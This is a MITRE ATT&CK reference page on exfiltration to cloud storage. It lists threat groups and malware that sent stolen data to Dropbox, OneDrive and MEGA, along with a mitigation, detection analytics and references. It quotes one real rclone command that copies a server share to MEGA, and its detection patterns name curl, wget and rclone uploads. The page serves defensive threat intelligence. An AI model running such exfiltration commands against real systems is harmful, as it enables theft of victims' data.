1. Home
  2. Techniques
  3. Enterprise
  4. Exfiltration Over Web Service
  5. Exfiltration to Cloud Storage

Exfiltration Over Web Service: Exfiltration to Cloud Storage

ID Name
T1567.001 Exfiltration to Code Repository
T1567.002 Exfiltration to Cloud Storage
T1567.003 Exfiltration to Text Storage Sites
T1567.004 Exfiltration Over Webhook

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

ID: T1567.002
Sub-technique of:  T1567
Tactic: Exfiltration
Platforms: ESXi, Linux, Windows, macOS
Version: 1.3
Created: 09 March 2020
Last Modified: 24 October 2025
Version Permalink

Procedure Examples

ID Name Description
G1024 Akira

Akira will exfiltrate victim data using applications such as Rclone.[1]
C0040 APT41 DUST

APT41 DUST exfiltrated collected information to OneDrive.[2]
S0635 BoomBox

BoomBox can upload data to dedicated per-victim folders in Dropbox.[3]
S0651 BoxCaon

BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.[4]
C0015 C0015

During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M.[5]
G0114 Chimera

Chimera has exfiltrated stolen data to OneDrive accounts.[6]
G1021 Cinnamon Tempest

Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS.[7]
S0660 Clambling

Clambling can send files from a victim's machine to Dropbox.[8][9]
G0142 Confucius

Confucius has exfiltrated victim data to cloud storage service accounts.[10]
G1052 Contagious Interview

Contagious Interview has exfiltrated stolen passwords to Dropbox.[11]
S1023 CreepyDrive

CreepyDrive can use cloud services including OneDrive for data exfiltration.[12]
S0538 Crutch

Crutch has exfiltrated stolen data to Dropbox.[13]
G1006 Earth Lusca

Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.[14]
G1003 Ember Bear

Ember Bear has used tools such as Rclone to exfiltrate information from victim environments to cloud storage such as mega.nz.[15]
S0363 Empire

Empire can use Dropbox for data exfiltration.[16]
G0046 FIN7

FIN7 has exfiltrated stolen data to the MEGA file sharing site.[17]
G0125 HAFNIUM

HAFNIUM has exfiltrated data to file sharing sites, including MEGA.[18]
S0037 HAMMERTOSS

HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.[19]
G1001 HEXANE

HEXANE has used cloud services, including OneDrive, for data exfiltration.[12]
G0119 Indrik Spider

Indrik Spider has exfiltrated data using Rclone or MEGASync prior to deploying ransomware.[20]
G0094 Kimsuky

Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts.[21] Kimsuky has also leveraged Dropbox for uploading victim system information.[22]
G0065 Leviathan

Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.[23][24]
G1014 LuminousMoth

LuminousMoth has exfiltrated data to Google Drive.[25]
G1051 Medusa Group

Medusa Group has utilized Rclone to exfiltrate data from victim environments to cloud storage.[26][27]
G0129 Mustang Panda

Mustang Panda has also exfiltrated archived files to cloud services such as Dropbox using curl.[28][29]
S0340 Octopus

Octopus has exfiltrated data to file sharing sites.[30]
S1170 ODAgent

ODAgent can use an attacker-controlled OneDrive account for exfiltration.[31]

S1172 OilBooster

OilBooster can exfiltrate files to an actor-controlled OneDrive account via the Microsoft Graph API.[31]
C0022 Operation Dream Job

During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.[32][33]
S1102 Pcexter

Pcexter can upload stolen files to OneDrive storage accounts via HTTP POST.[34]
G1005 POLONIUM

POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.[12]

S0629 RainyDay

RainyDay can use a file exfiltration tool to upload specific files to Dropbox.[35]

S1040 Rclone

Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.[36][5]
S1222 RIFLESPINE

RIFLESPINE can upload results from executed C2 commands to cloud storage.[37]
S0240 ROKRAT

ROKRAT can send collected data to cloud storage services such as PCloud.[38][39]
G1015 Scattered Spider

Scattered Spider has exfiltrated victim data to the MEGA file sharing site, SnowFlake, and AWS S3 buckets.[40][41][42]
G1053 Storm-0501

Storm-0501 has exfiltrated stolen data to the MEGA file sharing site.[43] Storm-0501 has also utilized Rclone to exfiltrate data from victim environments to cloud storage such as MegaSync.[44] Storm-0501 has exfiltrated data to their own infrastructure utilizing AzCopy Command-Line tool (CLI).[45]
G0027 Threat Group-3390

Threat Group-3390 has exfiltrated stolen data to Dropbox.[8]
G1022 ToddyCat

ToddyCat has used a DropBox uploader to exfiltrate stolen files.[34]
G0010 Turla

Turla has used WebDAV to upload stolen USB files to a cloud drive.[46] Turla has also exfiltrated stolen files to OneDrive and 4shared.[47]
G0102 Wizard Spider

Wizard Spider has exfiltrated stolen victim data to various cloud storage providers.[48]

G0128 ZIRCONIUM

ZIRCONIUM has exfiltrated stolen data to Dropbox.[49]

Mitigations

ID Mitigation Description
M1021 Restrict Web-Based Content

Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services.

Detection Strategy

ID Name Analytic ID Analytic Description
DET0570 Detection Strategy for Exfiltration to Cloud Storage AN1571

Unusual processes (e.g., powershell.exe, excel.exe) accessing large local files and subsequently initiating HTTPS POST requests to domains associated with cloud storage services (e.g., dropbox.com, drive.google.com, box.com). Defender perspective: correlation between file reads in sensitive directories and high outbound traffic volume to known storage APIs.
AN1572

Processes such as curl, wget, rclone, or custom scripts executing uploads to cloud storage endpoints. Defender perspective: detect chained events where tar/gzip is executed to compress files followed by HTTPS PUT/POST requests to known storage services.
AN1573

Applications or scripts invoking cloud storage APIs (Dropbox sync, iCloud, Google Drive client) in unexpected contexts. Defender perspective: detect sensitive file reads by non-standard applications followed by unusual encrypted uploads to external cloud storage domains.
AN1574

Unusual ESXi processes (vmx, hostd) reading datastore files and generating outbound HTTPS traffic toward external cloud storage endpoints. Defender perspective: anomalous datastore activity followed by network transfers to Dropbox, AWS S3, or other storage services.

References

  1. Secureworks. (n.d.). GOLD SAHARA. Retrieved February 20, 2024.
  2. Mike Stokkel et al. (2024, July 18). APT41 Has Arisen From the DUST. Retrieved September 16, 2024.
  3. MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
  4. CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.
  5. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
  6. Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved September 12, 2024.
  7. Biderman, O. et al. (2022, October 3). REVEALING EMPEROR DRAGONFLY: NIGHT SKY AND CHEERSCRYPT - A SINGLE RANSOMWARE GROUP. Retrieved December 6, 2023.
  8. Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
  9. Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.
  10. Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group's Cyberespionage Operations. Retrieved December 26, 2021.
  11. Amaury G., Coline Chavane, Felix Aimé and Sekoia TDR. (2025, March 31). From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic. Retrieved April 1, 2025.
  12. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
  13. Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.
  14. Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.
  15. US Cybersecurity & Infrastructure Security Agency et al. (2024, September 5). Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure. Retrieved September 6, 2024.
  16. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
  17. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
  18. MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.
  19. FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024.
  20. Mandiant Intelligence. (2022, June 2). To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions. Retrieved July 29, 2024.
  21. An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.
  22. Den Iuzvyk, Tim Peck. (2025, February 13). Analyzing DEEP#DRIVE: North Korean Threat Actors Observed Exploiting Trusted Platforms for Targeted Attacks. Retrieved August 19, 2025.
  23. Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
  24. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
  25. Botezatu, B and etl. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022.
  1. Cybersecurity and Infrastructure Security Agency. (2025, March 12). AA25-071A #StopRansomware: Medusa Ransomware. Retrieved October 15, 2025.
  2. Threat Hunter Team Symantec and Carbon Black. (2025, March 6). Medusa Ransomware Activity Continues to Increase. Retrieved October 15, 2025.
  3. Lior Rochberger, Tom Fakterman, Robert Falcone. (2023, September 22). Cyberespionage Attacks Against Southeast Asian Government Linked to Stately Taurus, Aka Mustang Panda. Retrieved September 9, 2025.
  4. Tom Fakterman. (2024, September 6). Chinese APT Abuses VSCode to Target Government in Asia. Retrieved March 24, 2025.
  5. Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
  6. Hromcova, Z. and Burgher, A. (2023, December 14). OilRig’s persistent attacks using cloud service-powered downloaders. Retrieved November 26, 2024.
  7. Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
  8. ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
  9. Dedola, G. et al. (2023, October 12). ToddyCat: Keep calm and check logs. Retrieved January 3, 2024.
  10. Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.
  11. Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.
  12. Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert: Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024.
  13. Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.
  14. Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.
  15. CISA. (2023, November 16). Cybersecurity Advisory: Scattered Spider (AA23-320A). Retrieved March 18, 2024.
  16. Microsoft. (2023, October 25). Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction. Retrieved March 18, 2024.
  17. Counter Adversary Operations. (2025, July 2). CrowdStrike Services Observes SCATTERED SPIDER Escalate Attacks Across Industries. Retrieved October 13, 2025.
  18. Tyler McLellan, Brandan Schondorfer. (2021, November 29). Kitten.gif: Meet the Sabbath Ransomware Affiliate Program, Again. Retrieved October 19, 2025.
  19. Microsoft Threat Intelligence. (2024, September 26). Storm-0501: Ransomware attacks expanding to hybrid cloud environments. Retrieved October 19, 2025.
  20. Microsoft Threat Intelligence. (2025, August 27). Storm-0501’s evolving techniques lead to cloud-based ransomware. Retrieved October 19, 2025.
  21. Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.
  22. Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
  23. Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.
  24. Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.